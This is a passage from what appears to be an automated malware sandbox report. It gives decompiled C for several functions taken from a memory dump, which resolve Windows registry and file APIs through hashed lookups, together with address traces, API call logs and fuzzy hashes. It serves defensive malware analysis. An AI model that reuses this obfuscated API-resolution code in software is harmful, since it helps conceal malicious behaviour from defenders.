				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E8C303C(0x8b9d0da7, 0xcaca77b9) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E8BF84C(_a8, _t15);
							if(E6E8C303C(0x8b9d0da7, 0xcaca77b9) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E8BF4E0(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e8c5790
0x6e8c5791
0x6e8c5793
0x6e8c5798
0x6e8c579f
0x6e8c57a3
0x6e8c57a3
0x6e8c57a3
0x6e8c57a7
0x6e8c57ed
0x6e8c57ed
0x6e8c57a9
0x6e8c57a9
0x6e8c57af
0x6e8c57b8
0x6e8c57bb
0x6e8c57d2
0x6e8c57e3
0x6e8c57e3
0x6e8c57e5
0x6e8c57eb
0x6e8c57f6
0x6e8c580e
0x6e8c582e
0x6e8c582e
0x6e8c5830
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8c57af
0x6e8c5838

APIs

RegQueryValueExA.KERNELBASE(?,6E8CD1F8,00000000,?,00000000,00000000,?,?,?,6E8CD1F8,?,6E8C585F,?,00000000,00000000), ref: 6E8C57E3
RegQueryValueExA.KERNELBASE(?,6E8CD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E8CD1F8,?,6E8C585F,?,00000000), ref: 6E8C582E

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction ID: b623da0dea6c4bd9907eda4948113ceaa5d6bdb52c89c110597a4f1c00b840f3
Opcode Fuzzy Hash: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction Fuzzy Hash: 2E11843120830AEFDA509BA9DC90EAB7BDCFF86A54F008D1DB594D6185DA61E880C672

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E8C5B14(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E8BD210(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E8BD714(__ecx, _t60);
					E6E8BD03C(_t56,  *_t60);
					E6E8BD020(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E8C6288(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E8BC2B0(_t40);
					if(E6E8BC2C4(_t40) != 0) {
						_t56[2] = E6E8C35C8(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E8C303C(0x10154545, 0x95343033);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E8C3670(_t59, 0xff, 8);
						if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e8c5b1b
0x6e8c5b1d
0x6e8c5b2a
0x6e8c5b2e
0x6e8c5b32
0x6e8c5b3c
0x6e8c5b43
0x6e8c5b43
0x6e8c5b4a
0x6e8c5b4c
0x6e8c5b51
0x6e8c5b5a
0x6e8c5b62
0x6e8c5b62
0x6e8c5b53
0x6e8c5b55
0x6e8c5b55
0x6e8c5b51
0x6e8c5b67
0x6e8c5b73
0x6e8c5ca4
0x6e8c5be1
0x6e8c5bea
0x6e8c5beb
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x00000000
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c86
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x00000000
0x6e8c5c6a
0x6e8c5b79
0x6e8c5b89
0x6e8c5b89

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8f7d7705fe01a08820252ffd769ee50bd94ecb6cae54ab6c1dfda7a649bbe8
Instruction ID: 03576f743df144d6da200e5783de81abe7c23822fd3ca688c0534af9afaca634
Opcode Fuzzy Hash: 0b8f7d7705fe01a08820252ffd769ee50bd94ecb6cae54ab6c1dfda7a649bbe8
Instruction Fuzzy Hash: 5731D67138430ABFEB506BF98D85FBB769DDB87A48F100C68FA519A1C1DF21D9058623

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E8C5B95(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E8BC2B0(_t24);
				if(E6E8BC2C4(_t24) != 0) {
					_t34[2] = E6E8C35C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E8C303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E8C3670(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e8c5b95
0x6e8c5b99
0x6e8c5b9c
0x6e8c5b9f
0x6e8c5be1
0x6e8c5bea
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x6e8c5c9e
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c4a
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x6e8c5c6a
0x6e8c5c6a
0x6e8c5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E8C5C16

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction ID: acf8c9bc6387933aacd6b097bb183b888ec7eee0d50d2704d9007f42cf355aea
Opcode Fuzzy Hash: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction Fuzzy Hash: 7C01D26138430ABFFB5027E95C41FBB779DDB83A98F004C25BA105A1C5DF22C84A8122

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E8C5BBD(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E8BC2B0(_t24);
					if(E6E8BC2C4(_t24) != 0) {
						_t33[2] = E6E8C35C8(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E8C303C(0x10154545, 0x95343033);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E8C3670(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e8c5bbd
0x6e8c5bbf
0x6e8c5bd6
0x6e8c5be1
0x6e8c5bea
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x6e8c5c9e
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c4a
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x6e8c5c6a
0x6e8c5c6a
0x6e8c5bc1
0x6e8c5bc1
0x6e8c5bc8
0x6e8c5bc8
0x6e8c5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E8C5C16

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction ID: da9059b4c9ee701498f9c88b8c1fe4acdf927c9e582c9304e0be3ac20489e29f
Opcode Fuzzy Hash: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction Fuzzy Hash: 5401226139430ABFFF9017E58C81FBB7A5DDB43A48F004C29FA114A1C5DF22D9598163

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E8C5BA9(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E8BC2B0(_t24);
				if(E6E8BC2C4(_t24) != 0) {
					_t34[2] = E6E8C35C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E8C303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E8C3670(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e8c5ba9
0x6e8c5bb0
0x6e8c5bb3
0x6e8c5be1
0x6e8c5bea
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x6e8c5c9e
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c4a
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x6e8c5c6a
0x6e8c5c6a
0x6e8c5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E8C5C16

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction ID: e07e258aa0503c105a83e29aa7b407d93e77e427930fc7974da969f985152a14
Opcode Fuzzy Hash: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction Fuzzy Hash: B701F56138030E7FFB5027E58C81FBB764DDB83A58F004C25FA118A1C6DF26C8598162

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E8C5B8B(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E8BC2B0(_t23);
				if(E6E8BC2C4(_t23) != 0) {
					_t31[2] = E6E8C35C8(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E8C303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8C3670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e8c5b8b
0x6e8c5b92
0x6e8c5be1
0x6e8c5bea
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x6e8c5c9e
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c4a
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x6e8c5c6a
0x6e8c5c6a
0x6e8c5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E8C5C16

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction ID: 90a89a2c7d71f7f28a2f8b28ba9269c4b2c42b1811b6a19bcc59c316b36d88c1
Opcode Fuzzy Hash: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction Fuzzy Hash: 35012F2138030EBFFB9027E58C81FBB764CDB83A48F000C29BA105A1C5DF22D9598162

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E8C5BD9(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E8C303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E8BC2B0(_t23);
				if(E6E8BC2C4(_t23) != 0) {
					_t31[2] = E6E8C35C8(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E8C303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8C3670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E8C303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e8c5bd9
0x6e8c5bdd
0x6e8c5be1
0x6e8c5bea
0x6e8c5bf0
0x6e8c5bf1
0x6e8c5be3
0x6e8c5be5
0x6e8c5be5
0x6e8c5c07
0x6e8c5c1b
0x6e8c5c09
0x6e8c5c16
0x6e8c5c18
0x6e8c5c18
0x6e8c5c1d
0x6e8c5c22
0x6e8c5c30
0x6e8c5c9b
0x6e8c5c9e
0x6e8c5c32
0x6e8c5c37
0x6e8c5c84
0x6e8c5c88
0x6e8c5c92
0x6e8c5c92
0x6e8c5c88
0x6e8c5c39
0x6e8c5c45
0x6e8c5c4a
0x6e8c5c5e
0x6e8c5c60
0x6e8c5c61
0x6e8c5c62
0x6e8c5c64
0x6e8c5c66
0x6e8c5c67
0x6e8c5c67
0x6e8c5c6a
0x6e8c5c6a
0x6e8c5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E8C5C16

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction ID: 8fc73f8f48769226443d9ce91f46676fd5dbcf6a2c44c26ea66c6ef3a9f35be2
Opcode Fuzzy Hash: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction Fuzzy Hash: 8E01F26139030E7FFB9027E58C81FBB7B5DDB83A9CF000C29BA115A1C2DF22D9598162

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E8C5DE8(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E8BC2C4(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E8C303C(0x10154545, 0x95343033) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e8c5dec
0x6e8c5ded
0x6e8c5def
0x6e8c5df5
0x6e8c5df7
0x6e8c5dfb
0x6e8c5dfb
0x6e8c5dff
0x6e8c5e0b
0x6e8c5e3f
0x6e8c5e3f
0x00000000
0x6e8c5e0d
0x6e8c5e12
0x6e8c5e13
0x6e8c5e27
0x6e8c5e38
0x6e8c5e29
0x6e8c5e34
0x6e8c5e34
0x6e8c5e3d
0x6e8c5e45
0x6e8c5e47
0x6e8c5e4a
0x6e8c5e4f
0x6e8c5e4f
0x6e8c5e53
0x6e8c5e58
0x00000000
0x00000000
0x00000000
0x6e8c5e3d

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,95343033,?,?,00000000,00000000,?,6E8C5D20,?,?), ref: 6E8C5E34

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction ID: bd50f3bc61b342d1a188a44d9c19282951103c525164618eff9cef09a42edc7f
Opcode Fuzzy Hash: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction Fuzzy Hash: 88F0F932A19F156EDB915FB99C40B9763D4DF97B14F104F29F550A6180EB70C8844292

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8C5624(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E8C303C(0x8b9d0da7, 0x73b21bac) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E8BE670(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e8c562e
0x6e8c5630
0x6e8c5637
0x6e8c5639
0x6e8c563d
0x6e8c563f
0x6e8c5642
0x6e8c5645
0x6e8c5645
0x6e8c565f
0x00000000
0x00000000
0x6e8c5670
0x6e8c5674
0x00000000
0x00000000
0x6e8c5682
0x6e8c5685
0x6e8c568a
0x6e8c568f
0x6e8c568f

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,8B9D0DA7,73B21BAC,?,?,8B9D0DA7,73B21BAC), ref: 6E8C5670

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
